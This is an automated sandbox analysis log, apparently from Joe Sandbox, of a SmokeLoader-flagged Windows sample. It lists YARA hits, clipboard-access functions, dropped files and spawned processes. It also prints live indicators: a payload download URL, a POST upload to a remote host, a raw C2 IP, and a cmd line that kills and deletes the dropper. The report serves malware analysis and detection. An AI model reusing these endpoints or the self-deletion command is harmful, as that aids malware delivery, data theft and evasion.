Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: bitbucket.orgConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190
Source: unknown	TCP traffic detected without corresponding DNS query: 65.108.80.190

Source: unknown

HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpoun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: brandyjaggers.com

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.231.129.81:443 -> 192.168.2.7:49845 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49858 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.90.100:443 -> 192.168.2.7:49866 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected SmokeLoader

Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.3040e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.AhB0i1fe7I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.AhB0i1fe7I.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.30a0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.jajvesg.30b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.jajvesg.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.370320300.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.250161255.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.370514515.0000000004CC1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.312248919.0000000003050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.357701243.00000000030B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.313765796.0000000004C91000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.294319854.00000000030F1000.00000020.00020000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_00408F4C IsClipboardFormatAvailable,OpenClipboard,CloseClipboard,

19_2_00408F4C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_00409086 GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,

19_2_00409086

System Summary:

Detected potential crypto function

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040B020	0_2_0040B020
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00409635	0_2_00409635
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040AACF	0_2_0040AACF
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040C16C	0_2_0040C16C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040B020	14_2_0040B020
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00409635	14_2_00409635
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040AACF	14_2_0040AACF
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040C16C	14_2_0040C16C
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: 19_2_004158DD	19_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 22_2_004158DD	22_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 23_2_004158DD	23_2_004158DD
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: 26_2_004158DD	26_2_004158DD

PE file contains strange resources

Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: AhB0i1fe7I.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 45C4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: A8D4.exe.3.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: A8D4.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: jajvesg.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SmartClock.exe.19.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Windows\explorer.exe

Section loaded: webio.dll

Uses 32bit PE files

Source: AhB0i1fe7I.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040A400 appears 99 times
Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Code function: String function: 0040F159 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Code function: String function: 0040A400 appears 33 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401889 Sleep,NtTerminateProcess,	0_2_00401889
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F51 NtQuerySystemInformation,	0_2_00401F51
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402451 NtEnumerateKey,	0_2_00402451
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F5C NtQuerySystemInformation,	0_2_00401F5C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401865 Sleep,NtTerminateProcess,	0_2_00401865
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402402 NtOpenKey,NtEnumerateKey,	0_2_00402402
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402107 NtQuerySystemInformation,	0_2_00402107
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401829 Sleep,NtTerminateProcess,	0_2_00401829
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F31 NtQuerySystemInformation,	0_2_00401F31
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F3C NtQuerySystemInformation,	0_2_00401F3C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004023C8 NtOpenKey,NtEnumerateKey,	0_2_004023C8
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004021CD NtQuerySystemInformation,	0_2_004021CD
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004024E5 NtClose,	0_2_004024E5
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00402091 NtQuerySystemInformation,	0_2_00402091
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401F92 NtQuerySystemInformation,	0_2_00401F92
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_00401896 Sleep,NtTerminateProcess,	0_2_00401896
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_0040219C NtQuerySystemInformation,	0_2_0040219C
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004018A5 Sleep,NtTerminateProcess,	0_2_004018A5
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004024A9 NtEnumerateKey,	0_2_004024A9
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004021AB NtQuerySystemInformation,	0_2_004021AB
Source: C:\Users\user\Desktop\AhB0i1fe7I.exe	Code function: 0_2_004018B8 NtTerminateProcess,	0_2_004018B8
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401889 Sleep,NtTerminateProcess,	14_2_00401889
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F51 NtQuerySystemInformation,	14_2_00401F51
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402451 NtEnumerateKey,	14_2_00402451
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F5C NtQuerySystemInformation,	14_2_00401F5C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401865 Sleep,NtTerminateProcess,	14_2_00401865
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402402 NtOpenKey,NtEnumerateKey,	14_2_00402402
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402107 NtQuerySystemInformation,	14_2_00402107
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401829 Sleep,NtTerminateProcess,	14_2_00401829
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F31 NtQuerySystemInformation,	14_2_00401F31
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F3C NtQuerySystemInformation,	14_2_00401F3C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004023C8 NtOpenKey,NtEnumerateKey,	14_2_004023C8
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004021CD NtQuerySystemInformation,	14_2_004021CD
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004024E5 NtClose,	14_2_004024E5
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00402091 NtQuerySystemInformation,	14_2_00402091
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401F92 NtQuerySystemInformation,	14_2_00401F92
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_00401896 Sleep,NtTerminateProcess,	14_2_00401896
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_0040219C NtQuerySystemInformation,	14_2_0040219C
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004018A5 Sleep,NtTerminateProcess,	14_2_004018A5
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004024A9 NtEnumerateKey,	14_2_004024A9
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004021AB NtQuerySystemInformation,	14_2_004021AB
Source: C:\Users\user\AppData\Roaming\jajvesg	Code function: 14_2_004018B8 NtTerminateProcess,	14_2_004018B8

Source: AhB0i1fe7I.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 45C4.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: jajvesg.3.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SmartClock.exe.19.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: AhB0i1fe7I.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\jajvesg

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@16/26@41/12

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

File read: C:\Users\desktop.ini

Source: AhB0i1fe7I

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_004017BA FindResourceW,LoadResource,LockResource,SizeofResource,

19_2_004017BA

Source: AhB0i1fe7I.exe

Virustotal: Detection: 35%

Source: C:\Users\user\Desktop\AhB0i1fe7I.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\AhB0i1fe7I.exe 'C:\Users\user\Desktop\AhB0i1fe7I.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\jajvesg C:\Users\user\AppData\Roaming\jajvesg
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\45C4.exe C:\Users\user~1\AppData\Local\Temp\45C4.exe
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe 'C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A8D4.exe C:\Users\user~1\AppData\Local\Temp\A8D4.exe
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\45C4.exe C:\Users\user~1\AppData\Local\Temp\45C4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\45C4.exe	Process created: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe 'C:\ProgramData\CP8Z9ZN3KMVU03RJ.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A8D4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /im A8D4.exe /f & timeout /t 6 & del /f /q 'C:\Users\user~1\AppData\Local\Temp\A8D4.exe' & del C:\ProgramData\*.dll & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im A8D4.exe /f	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "A8D4.exe")

Source: C:\Windows\explorer.exe

File created: C:\Users\user~1\AppData\Local\Temp\45C4.tmp

Source: C:\Users\user\AppData\Local\Temp\45C4.exe

Code function: 19_2_004035C8 CoInitializeEx,CoCreateInstance,

19_2_004035C8

Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: softokn3[1].dll.27.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: softokn3[1].dll.27.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: softokn3[1].dll.27.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: A8D4.exe, 0000001B.00000002.506315129.0000000006760000.00000004.00000001.sdmp, nss3[1].dll.27.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: softokn3[1].dll.27.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3[1].dll.27.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Users\user\AppData\Roaming\Smart Clock\SmartClock.exe	Mutant created: \Sessions\1\BaseNamedObjects\{48D87B02-03F7-4188-8BE8-7733FF2CBCA6}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_01

